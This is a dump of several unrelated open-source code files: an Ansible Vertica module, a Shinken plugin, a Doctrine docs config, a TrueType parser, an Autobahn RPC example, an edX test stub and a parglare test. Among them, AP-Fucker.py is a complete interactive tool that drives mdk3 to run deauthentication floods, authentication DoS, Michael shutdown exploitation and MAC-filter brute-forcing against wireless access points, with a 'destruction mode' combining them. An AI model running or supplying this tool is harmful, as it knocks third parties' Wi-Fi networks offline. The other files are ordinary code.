db = module.params['db']
changed = False
try:
dsn = (
"Driver=Vertica;"
"Server={0};"
"Port={1};"
"Database={2};"
"User={3};"
"Password={4};"
"ConnectionLoadBalance={5}"
).format(module.params['cluster'], module.params['port'], db,
module.params['login_user'], module.params['login_password'], 'true')
db_conn = pyodbc.connect(dsn, autocommit=True)
cursor = db_conn.cursor()
except Exception:
e = get_exception()
module.fail_json(msg="Unable to connect to database: {0}.".format(e))
try:
user_facts = get_user_facts(cursor)
if module.check_mode:
changed = not check(user_facts, user, profile, resource_pool,
locked, password, expired, ldap, roles)
elif state == 'absent':
try:
changed = absent(user_facts, cursor, user, roles)
except pyodbc.Error:
e = get_exception()
module.fail_json(msg=str(e))
elif state in ['present', 'locked']:
try:
changed = present(user_facts, cursor, user, profile, resource_pool,
locked, password, expired, ldap, roles)
except pyodbc.Error:
e = get_exception()
module.fail_json(msg=str(e))
except NotSupportedError:
e = get_exception()
module.fail_json(msg=str(e), ansible_facts={'vertica_users': user_facts})
except CannotDropError:
e = get_exception()
module.fail_json(msg=str(e), ansible_facts={'vertica_users': user_facts})
except SystemExit:
# avoid catching this on python 2.4
raise
except Exception:
e = get_exception()
module.fail_json(msg=e)
module.exit_json(changed=changed, user=user, ansible_facts={'vertica_users': user_facts})
if __name__ == '__main__':
main()
| gpl-3.0 |
baloo/shinken | shinken/webui/plugins/flow/flow.py | 1 | 3289 | ### Will be populated by the UI with its own value
app = None
import time
from shinken.webui.bottle import redirect
from shinken.modules.webui_broker.helper import hst_srv_sort
from shinken.util import safe_print
try:
import json
except ImportError:
# For old Python version, load
# simple json (it can be hard json?! It's 2 functions guy!)
try:
import simplejson as json
except ImportError:
print "Error : you need the json or simplejson module"
raise
# Get the div for each element
def get_div(elt):
icon = app.helper.get_icon_state(elt)
stars = ''
for i in range(2, elt.business_impact):
stars += '''<div class="criticity-inpb-icon-%d">
<img src="/static/images/star.png">
</div>''' % (i-1)
lnk = app.helper.get_link_dest(elt)
button = app.helper.get_button('', img='/static/images/search.png')
button_recheck = '''<a href="#" onclick="recheck_now('%s')">%s</a>''' % (elt.get_full_name(), app.helper.get_button('Recheck', img='/static/images/delay.gif'))
button_ack = '''<a href="#" onclick="acknowledge('%s')">%s</a>''' % (elt.get_full_name(), app.helper.get_button('Ack', img='/static/images/wrench.png'))
pulse = ''
if elt.is_problem or (elt.state_id != 0 and elt.business_impact > 2):
pulse = '<span class="wall-pulse pulse" title=""></span>'
s = """
%s
%s
<div class="item-icon">
<img class="wall-icon" src="%s"></img>
</div>
<div class="item-text">
<span class="state_%s">%s %s</span>
</div>
<div class="item-button">
<a href="%s">%s</a>
</div>
<div class="recheck-button">
%s
</div>
<div class="ack-button">
%s
</div>
""" % (stars, pulse, icon, elt.state.lower(), elt.state, elt.get_full_name(), lnk, button, button_recheck, button_ack)
s = s.encode('utf8', 'ignore')
return s
# Our page
def get_page():
# First we look for the user sid
# so we bail out if it's a false one
user = app.get_user_auth()
if not user:
redirect("/user/login")
all_imp_impacts = app.datamgr.get_important_elements()
all_imp_impacts.sort(hst_srv_sort)
#all_imp_impacts.sort(hst_srv_sort)
#all_imp_impacts = app.datamgr.get_services()#important_elements()
impacts = []
for imp in all_imp_impacts:
safe_print("FIND A BAD SERVICE IN IMPACTS", imp.get_dbg_name())
d = {'name' : imp.get_full_name().encode('utf8', 'ignore'),
"title": "My Image 3", "thumb": "/static/images/state_flapping.png", "zoom": "/static/images/state_flapping.png",
"html" : get_div(imp)}
impacts.append(d)
# Got in json format
#j_impacts = json.dumps(impacts)
# print "Return impact in json", j_impacts
all_pbs = app.datamgr.get_all_problems()
now = time.time()
# Get only the last 10min errors
all_pbs = [pb for pb in all_pbs if pb.last_state_change > now - 600]
# And sort it
all_pbs.sort(hst_srv_sort)  # sort by last state change
return {'app' : app, 'user' : user, 'impacts' : impacts, 'problems' : all_pbs}
pages = {get_page : { 'routes' : ['/flow/'], 'view' : 'flow', 'static' : True}}
| agpl-3.0 |
alberttjahyono/posrepo | UbUjian/vendor/doctrine/orm/docs/en/conf.py | 2448 | 6497 | # -*- coding: utf-8 -*-
#
# Doctrine 2 ORM documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 18:10:24 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('_exts'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['configurationblock']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Doctrine 2 ORM'
copyright = u'2010-12, Doctrine Project Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2'
# The full version, including alpha/beta/rc tags.
release = '2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'doctrine'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Doctrine2ORMdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Doctrine2ORM.tex', u'Doctrine 2 ORM Documentation',
u'Doctrine Project Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
primary_domain = "dcorm"
def linkcode_resolve(domain, info):
if domain == 'dcorm':
return 'http://'
return None
| apache-2.0 |
brototyp/CouchPotato | library/hachoir_parser/misc/ttf.py | 95 | 9417 | """
TrueType Font parser.
Documents:
- "An Introduction to TrueType Fonts: A look inside the TTF format"
written by "NRSI: Computers & Writing Systems"
http://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&item_id=IWS-Chapter08
Author: Victor Stinner
Creation date: 2007-02-08
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet, ParserError,
UInt16, UInt32, Bit, Bits,
PaddingBits, NullBytes,
String, RawBytes, Bytes, Enum,
TimestampMac32)
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.text_handler import textHandler, hexadecimal, filesizeHandler
MAX_NAME_COUNT = 300
MIN_NB_TABLE = 3
MAX_NB_TABLE = 30
DIRECTION_NAME = {
0: u"Mixed directional",
1: u"Left to right",
2: u"Left to right + neutrals",
-1: u"Right to left",
-2: u"Right to left + neutrals",
}
NAMEID_NAME = {
0: u"Copyright notice",
1: u"Font family name",
2: u"Font subfamily name",
3: u"Unique font identifier",
4: u"Full font name",
5: u"Version string",
6: u"Postscript name",
7: u"Trademark",
8: u"Manufacturer name",
9: u"Designer",
10: u"Description",
11: u"URL Vendor",
12: u"URL Designer",
13: u"License Description",
14: u"License info URL",
16: u"Preferred Family",
17: u"Preferred Subfamily",
18: u"Compatible Full",
19: u"Sample text",
20: u"PostScript CID findfont name",
}
PLATFORM_NAME = {
0: "Unicode",
1: "Macintosh",
2: "ISO",
3: "Microsoft",
4: "Custom",
}
CHARSET_MAP = {
# (platform, encoding) => charset
0: {3: "UTF-16-BE"},
1: {0: "MacRoman"},
3: {1: "UTF-16-BE"},
}
class TableHeader(FieldSet):
def createFields(self):
yield String(self, "tag", 4)
yield textHandler(UInt32(self, "checksum"), hexadecimal)
yield UInt32(self, "offset")
yield filesizeHandler(UInt32(self, "size"))
def createDescription(self):
return "Table entry: %s (%s)" % (self["tag"].display, self["size"].display)
class NameHeader(FieldSet):
def createFields(self):
yield Enum(UInt16(self, "platformID"), PLATFORM_NAME)
yield UInt16(self, "encodingID")
yield UInt16(self, "languageID")
yield Enum(UInt16(self, "nameID"), NAMEID_NAME)
yield UInt16(self, "length")
yield UInt16(self, "offset")
def getCharset(self):
platform = self["platformID"].value
encoding = self["encodingID"].value
try:
return CHARSET_MAP[platform][encoding]
except KeyError:
self.warning("TTF: Unknown charset (%s,%s)" % (platform, encoding))
return "ISO-8859-1"
def createDescription(self):
platform = self["platformID"].display
name = self["nameID"].display
return "Name record: %s (%s)" % (name, platform)
def parseFontHeader(self):
yield UInt16(self, "maj_ver", "Major version")
yield UInt16(self, "min_ver", "Minor version")
yield UInt16(self, "font_maj_ver", "Font major version")
yield UInt16(self, "font_min_ver", "Font minor version")
yield textHandler(UInt32(self, "checksum"), hexadecimal)
yield Bytes(self, "magic", 4, r"Magic string (\x5F\x0F\x3C\xF5)")
if self["magic"].value != "\x5F\x0F\x3C\xF5":
raise ParserError("TTF: invalid magic of font header")
# Flags
yield Bit(self, "y0", "Baseline at y=0")
yield Bit(self, "x0", "Left sidebearing point at x=0")
yield Bit(self, "instr_point", "Instructions may depend on point size")
yield Bit(self, "ppem", "Force PPEM to integer values for all")
yield Bit(self, "instr_width", "Instructions may alter advance width")
yield Bit(self, "vertical", "e laid out vertically?")
yield PaddingBits(self, "reserved[]", 1)
yield Bit(self, "linguistic", "Requires layout for correct linguistic rendering?")
yield Bit(self, "gx", "Metamorphosis effects?")
yield Bit(self, "strong", "Contains strong right-to-left glyphs?")
yield Bit(self, "indic", "contains Indic-style rearrangement effects?")
yield Bit(self, "lossless", "Data is lossless (Agfa MicroType compression)")
yield Bit(self, "converted", "Font converted (produce compatible metrics)")
yield Bit(self, "cleartype", "Optimised for ClearType")
yield Bits(self, "adobe", 2, "(used by Adobe)")
yield UInt16(self, "unit_per_em", "Units per em")
if not(16 <= self["unit_per_em"].value <= 16384):
raise ParserError("TTF: Invalid unit/em value")
yield UInt32(self, "created_high")
yield TimestampMac32(self, "created")
yield UInt32(self, "modified_high")
yield TimestampMac32(self, "modified")
yield UInt16(self, "xmin")
yield UInt16(self, "ymin")
yield UInt16(self, "xmax")
yield UInt16(self, "ymax")
# Mac style
yield Bit(self, "bold")
yield Bit(self, "italic")
yield Bit(self, "underline")
yield Bit(self, "outline")
yield Bit(self, "shadow")
yield Bit(self, "condensed", "(narrow)")
yield Bit(self, "expanded")
yield PaddingBits(self, "reserved[]", 9)
yield UInt16(self, "lowest", "Smallest readable size in pixels")
yield Enum(UInt16(self, "font_dir", "Font direction hint"), DIRECTION_NAME)
yield Enum(UInt16(self, "ofst_format"), {0: "short offsets", 1: "long"})
yield UInt16(self, "glyph_format", "(=0)")
def parseNames(self):
# Read header
yield UInt16(self, "format")
if self["format"].value != 0:
raise ParserError("TTF (names): Invalid format (%u)" % self["format"].value)
yield UInt16(self, "count")
yield UInt16(self, "offset")
if MAX_NAME_COUNT < self["count"].value:
raise ParserError("Invalid number of names (%s)"
% self["count"].value)
# Read name index
entries = []
for index in xrange(self["count"].value):
entry = NameHeader(self, "header[]")
yield entry
entries.append(entry)
# Sort names by their offset
entries.sort(key=lambda field: field["offset"].value)
# Read name value
last = None
for entry in entries:
# Skip duplicates values
new = (entry["offset"].value, entry["length"].value)
if last and last == new:
self.warning("Skip duplicate %s %s" % (entry.name, new))
continue
last = (entry["offset"].value, entry["length"].value)
# Skip negative offset
offset = entry["offset"].value + self["offset"].value
if offset < self.current_size//8:
self.warning("Skip value %s (negative offset)" % entry.name)
continue
# Add padding if any
padding = self.seekByte(offset, relative=True, null=True)
if padding:
yield padding
# Read value
size = entry["length"].value
if size:
yield String(self, "value[]", size, entry.description, charset=entry.getCharset())
padding = (self.size - self.current_size) // 8
if padding:
yield NullBytes(self, "padding_end", padding)
class Table(FieldSet):
TAG_INFO = {
"head": ("header", "Font header", parseFontHeader),
"name": ("names", "Names", parseNames),
}
def __init__(self, parent, name, table, **kw):
FieldSet.__init__(self, parent, name, **kw)
self.table = table
tag = table["tag"].value
if tag in self.TAG_INFO:
self._name, self._description, self.parser = self.TAG_INFO[tag]
else:
self.parser = None
def createFields(self):
if self.parser:
for field in self.parser(self):
yield field
else:
yield RawBytes(self, "content", self.size//8)
def createDescription(self):
return "Table %s (%s)" % (self.table["tag"].value, self.table.path)
class TrueTypeFontFile(Parser):
endian = BIG_ENDIAN
PARSER_TAGS = {
"id": "ttf",
"category": "misc",
"file_ext": ("ttf",),
"min_size": 10*8, # FIXME
"description": "TrueType font",
}
def validate(self):
if self["maj_ver"].value != 1:
return "Invalid major version (%u)" % self["maj_ver"].value
if self["min_ver"].value != 0:
return "Invalid minor version (%u)" % self["min_ver"].value
if not (MIN_NB_TABLE <= self["nb_table"].value <= MAX_NB_TABLE):
return "Invalid number of table (%u)" % self["nb_table"].value
return True
def createFields(self):
yield UInt16(self, "maj_ver", "Major version")
yield UInt16(self, "min_ver", "Minor version")
yield UInt16(self, "nb_table")
yield UInt16(self, "search_range")
yield UInt16(self, "entry_selector")
yield UInt16(self, "range_shift")
tables = []
for index in xrange(self["nb_table"].value):
table = TableHeader(self, "table_hdr[]")
yield table
tables.append(table)
tables.sort(key=lambda field: field["offset"].value)
for table in tables:
padding = self.seekByte(table["offset"].value, null=True)
if padding:
yield padding
size = table["size"].value
if size:
yield Table(self, "table[]", table, size=size*8)
padding = self.seekBit(self.size, null=True)
if padding:
yield padding
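# Usage sketch (assumes hachoir_core's stream API; the file name is
# hypothetical):
#
#   from hachoir_core.stream import FileInputStream
#   parser = TrueTypeFontFile(FileInputStream(u"/tmp/font.ttf"))
#   print parser["table_hdr[0]/tag"].value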
| gpl-3.0 |
ahmedbodi/AutobahnPython | examples/twisted/wamp1/rpc/simple/example2/server.py | 17 | 3564 | ###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import sys, math
from twisted.python import log
from twisted.internet import reactor, defer
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.twisted.websocket import listenWS
from autobahn.wamp1.protocol import exportRpc, \
WampServerFactory, \
WampServerProtocol
class Calc:
"""
A simple calc service we will export for Remote Procedure Calls (RPC).
All you need to do is use the @exportRpc decorator on methods
you want to provide for RPC and register a class instance in the
server factory (see below).
The method will be exported under the Python method name, or
under the (optional) name you can provide as an argument to the
decorator (see asyncSum()).
"""
@exportRpc
def add(self, x, y):
return x + y
@exportRpc
def sub(self, x, y):
return x - y
@exportRpc
def square(self, x):
MAX = 1000
if x > MAX:
## raise a custom exception
raise Exception("http://example.com/error#number_too_big",
"%d too big for me, max is %d" % (x, MAX),
MAX)
return x * x
@exportRpc
def sum(self, list):
return reduce(lambda x, y: x + y, list)
@exportRpc
def pickySum(self, list):
errs = []
for i in list:
if i % 3 == 0:
errs.append(i)
if len(errs) > 0:
raise Exception("http://example.com/error#invalid_numbers",
"one or more numbers are multiples of 3",
errs)
return reduce(lambda x, y: x + y, list)
@exportRpc
def sqrt(self, x):
return math.sqrt(x)
@exportRpc("asum")
def asyncSum(self, list):
## Simulate a slow function.
d = defer.Deferred()
reactor.callLater(3, d.callback, self.sum(list))
return d
class SimpleServerProtocol(WampServerProtocol):
"""
Demonstrates creating a simple server with Autobahn WebSockets that
responds to RPC calls.
"""
def onSessionOpen(self):
# when connection is established, we create our
# service instances ...
self.calc = Calc()
# .. and register them for RPC. that's it.
self.registerForRpc(self.calc, "http://example.com/simple/calc#")
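        # A connected WAMP v1 client could then invoke the service along
        # these lines (a sketch, from inside a client's onSessionOpen;
        # results arrive via Twisted Deferreds):
        #
        #   d = self.call("http://example.com/simple/calc#add", 23, 7)
        #   d.addCallback(lambda res: log.msg(res))  # res == 30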
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'debug':
log.startLogging(sys.stdout)
debug = True
else:
debug = False
factory = WampServerFactory("ws://localhost:9000", debugWamp = debug)
factory.protocol = SimpleServerProtocol
factory.setProtocolOptions(allowHixie76 = True)
listenWS(factory)
webdir = File(".")
web = Site(webdir)
reactor.listenTCP(8080, web)
reactor.run()
| apache-2.0 |
sameetb-cuelogic/edx-platform-test | common/djangoapps/enrollment/tests/fake_data_api.py | 26 | 3120 | """
A Fake Data API for testing purposes.
"""
import copy
import datetime
_DEFAULT_FAKE_MODE = {
"slug": "honor",
"name": "Honor Code Certificate",
"min_price": 0,
"suggested_prices": "",
"currency": "usd",
"expiration_datetime": None,
"description": None
}
_ENROLLMENTS = []
_COURSES = []
# pylint: disable=unused-argument
def get_course_enrollments(student_id):
"""Stubbed out Enrollment data request."""
return _ENROLLMENTS
def get_course_enrollment(student_id, course_id):
"""Stubbed out Enrollment data request."""
return _get_fake_enrollment(student_id, course_id)
def create_course_enrollment(student_id, course_id, mode='honor', is_active=True):
"""Stubbed out Enrollment creation request. """
return add_enrollment(student_id, course_id, mode=mode, is_active=is_active)
def update_course_enrollment(student_id, course_id, mode=None, is_active=None):
"""Stubbed out Enrollment data request."""
enrollment = _get_fake_enrollment(student_id, course_id)
if enrollment and mode is not None:
enrollment['mode'] = mode
if enrollment and is_active is not None:
enrollment['is_active'] = is_active
return enrollment
def get_course_enrollment_info(course_id):
"""Stubbed out Enrollment data request."""
return _get_fake_course_info(course_id)
def _get_fake_enrollment(student_id, course_id):
"""Get an enrollment from the enrollments array."""
for enrollment in _ENROLLMENTS:
if student_id == enrollment['student'] and course_id == enrollment['course']['course_id']:
return enrollment
def _get_fake_course_info(course_id):
"""Get a course from the courses array."""
for course in _COURSES:
if course_id == course['course_id']:
return course
def add_enrollment(student_id, course_id, is_active=True, mode='honor'):
"""Append an enrollment to the enrollments array."""
enrollment = {
"created": datetime.datetime.now(),
"mode": mode,
"is_active": is_active,
"course": _get_fake_course_info(course_id),
"student": student_id
}
_ENROLLMENTS.append(enrollment)
return enrollment
def add_course(course_id, enrollment_start=None, enrollment_end=None, invite_only=False, course_modes=None):
"""Append course to the courses array."""
course_info = {
"course_id": course_id,
"enrollment_end": enrollment_end,
"course_modes": [],
"enrollment_start": enrollment_start,
"invite_only": invite_only,
}
if not course_modes:
course_info['course_modes'].append(_DEFAULT_FAKE_MODE)
else:
for mode in course_modes:
new_mode = copy.deepcopy(_DEFAULT_FAKE_MODE)
new_mode['slug'] = mode
course_info['course_modes'].append(new_mode)
_COURSES.append(course_info)
def reset():
"""Set the enrollments and courses arrays to be empty."""
global _COURSES # pylint: disable=global-statement
_COURSES = []
global _ENROLLMENTS # pylint: disable=global-statement
_ENROLLMENTS = []
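# Usage sketch for tests (course id and user are hypothetical):
#
#   reset()
#   add_course('edX/DemoX/Demo', course_modes=['honor', 'verified'])
#   create_course_enrollment('bob', 'edX/DemoX/Demo', mode='verified')
#   assert get_course_enrollment('bob', 'edX/DemoX/Demo')['is_active']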
| agpl-3.0 |
PrinceShaji/StreamBox | TestCodes/examplecodes/AP-Fucker.py | 1 | 9270 |
#!/usr/bin/env python
# -*- coding: Utf-8 -*-
#
# WIRELESS ACCESS POINT FUCKER
# Interactive, Multifunction, Destruction Mode Included
#
# Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ
#
# USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy!
# Prerequisites: Have mdk3 installed
#
__app__ = "AP-Fucker"
__version__ = "0.5"
__author__ = "MatToufoutu"
### IMPORTS
from sys import stdout
from sys import exit as sysexit
from os import system, remove, path
from commands import getoutput
from threading import Thread
from time import sleep, ctime
### MDK3 THREADED ATTACKS CLASS
class Mdk3(Thread):
def __init__(self, attack, attack_options):
Thread.__init__(self)
self.attack = attack
self.iface = attack_options[0]
self.essid = attack_options[1]
self.bssid = attack_options[2]
self.chan = attack_options[3]
self.log = "apfucker.log"
self.modes = {"B":self.bflood, "A":self.ados, "D":self.amok,
"M":self.mich, "W":self.wids, "C":self.brutmac}
def bflood(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
out.close()
print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log)
def ados(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
out.close()
print("\n Launching Auth DoS against %s " % (self.bssid))
sleep(2)
system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
def amok(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
out.close()
print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
sleep(2)
system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log)
def mich(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
out.close()
print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
def wids(self):
out = open(self.log,"a")
out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
out.close()
print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
sleep(2)
system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
def brutmac(self):
global runanim
runanim = True
out = open(self.log, "a")
out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid))
print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid))
sleep(2)
macfound = getoutput("mdk3 "+self.iface+" f -t "+self.bssid).splitlines()[-2:]
runanim = False
sleep(1)
print; print
for line in macfound:
print(line)
out.write("\n"+line)
out.close()
print
sysexit(0)
def run(self):
global runanim
runanim = True
self.modes[self.attack]()
runanim = False
### AUXILIARY FUNCTIONS
## CHECK IF IFACE IS IN MONITOR MODE
def check_mon(iface):
for line in getoutput("iwconfig "+iface).splitlines():
if "Mode:Monitor" in line:
return True
return False
## CHECK IF BSSID IS VALID
def check_mac(ap):
if len(ap) != 17 or ap.count(':') != 5:
return False
macchar = "0123456789abcdef:"
for c in ap.lower():
if macchar.find(c) == -1:
return False
return True
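# e.g. check_mac("00:11:22:aa:bb:cc") -> True ; check_mac("00:11:22") -> False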
## CHECK IF CHANNEL IS VALID
def check_chan(iface, chan):
if chan.isdigit():
channel = int(chan)
if not channel in range(1, int(getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1):
return False
else:
return False
return True
## CLEAN EXIT
def clean_exit():
print;print
print("\nAction aborted by user. Exiting now")
for pid in getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines():
system("kill -9 "+pid)
print("Hope you enjoyed it ;-)")
sleep(2)
system("clear")
sysexit(0)
## DUMMY WAITING MESSAGE (ANIMATED)
def waiter(mess):
    try:
        # cycle the spinner twice per call: | / -- \ | / -- \
        for frame in (" | ", " / ", "-- ", " \\ ") * 2:
            stdout.write("\r" + frame + mess)
            stdout.flush()
            sleep(0.15)
    except KeyboardInterrupt:
        clean_exit()
### MAIN APP
try:
import psyco
psyco.full()
except ImportError:
pass
attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"]
attack_opt = []
if getoutput("whoami") != "root":
print("This script must be run as root !")
sysexit(0)
try:
system("clear")
print("\n\t\t########## ACCESS POINT FUCKER ##########\n")
print("""Choose your Mode:
\t - (B)eacon flood
\t - (A)uth DoS
\t - (W)ids confusion
\t - (D)isassociation 'AmoK Mode'
\t - (M)ichael shutdown exploitation
\t - MA(C) Filter Brute-Forcer
\t - Des(T)ruction mode (USE WITH CAUTION)\n""")
## GET MODE
while 1:
mode = raw_input("\n>>> ")
if mode.upper() not in attackAvail:
print(" '%s' is not a valid mode !" % mode)
else:
break
## GET INTERFACE
while 1:
iface = raw_input("\nMonitor interface to use: ")
if check_mon(iface):
attack_opt.append(iface)
break
else:
print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)
## GET ESSID
if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
else:
attack_opt.append(None)
## GET BSSID
if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C":
while 1:
bssid = raw_input("\nTarget BSSID: ")
if check_mac(bssid):
attack_opt.append(bssid)
break
else:
print("Invalid BSSID, try again or hit Ctrl+C to quit")
else:
attack_opt.append(None)
## GET CHANNEL
if mode.upper() != "C":
while 1:
channel = raw_input("\nTarget channel: ")
if check_chan(iface, channel):
attack_opt.append(channel)
break
else:
print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
else:
attack_opt.append(None)
## LAUNCH SELECTED ATTACK
if path.exists("apfucker.log"):
remove("apfucker.log")
if mode.upper() != "T":
system('clear')
Mdk3(mode.upper(), attack_opt).start()
sleep(1)
print; print; print
while runanim:
waiter(" ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
else:
system('clear')
print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
print(" You've choosen DESTRUCTION MODE")
print(" Using this mode may harm your WiFi card, use it at your own risks.")
validate = raw_input(" Do you wish to continue? (y/N): ")
if validate.upper() != "Y":
print(" Ok, exiting now")
sysexit(0)
else:
out = open("apfucker.log","a")
out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
out.close()
print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
print(" Please be kind with your neighbours xD")
##wids not implemented: may raise segfault
##appears to be an internal mdk3 issue when running multiple attacks
for atk in ("B", "A", "D", "M"):
Mdk3(atk, attack_opt).start()
sleep(1)
print; print; print
while runanim:
waiter(" DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
except KeyboardInterrupt:
clean_exit()
| mit |
igordejanovic/parglare | tests/func/grammar/test_grammar.py | 1 | 10211 | # -*- coding: utf-8 -*-
import pytest
from parglare import Parser, Grammar
from parglare.grammar import ASSOC_LEFT, ASSOC_RIGHT, DEFAULT_PRIORITY
from parglare.exceptions import GrammarError, ParseError
def test_single_terminal():
"""
Test that grammar may be just a single terminal.
"""
grammar = r"""
S: A;
terminals
A: "a";
"""
g = Grammar.from_string(grammar)
parser = Parser(g)
result = parser.parse('a')
assert result == 'a'
grammar = r"""
S: A;
terminals
A: /\d+/;
"""
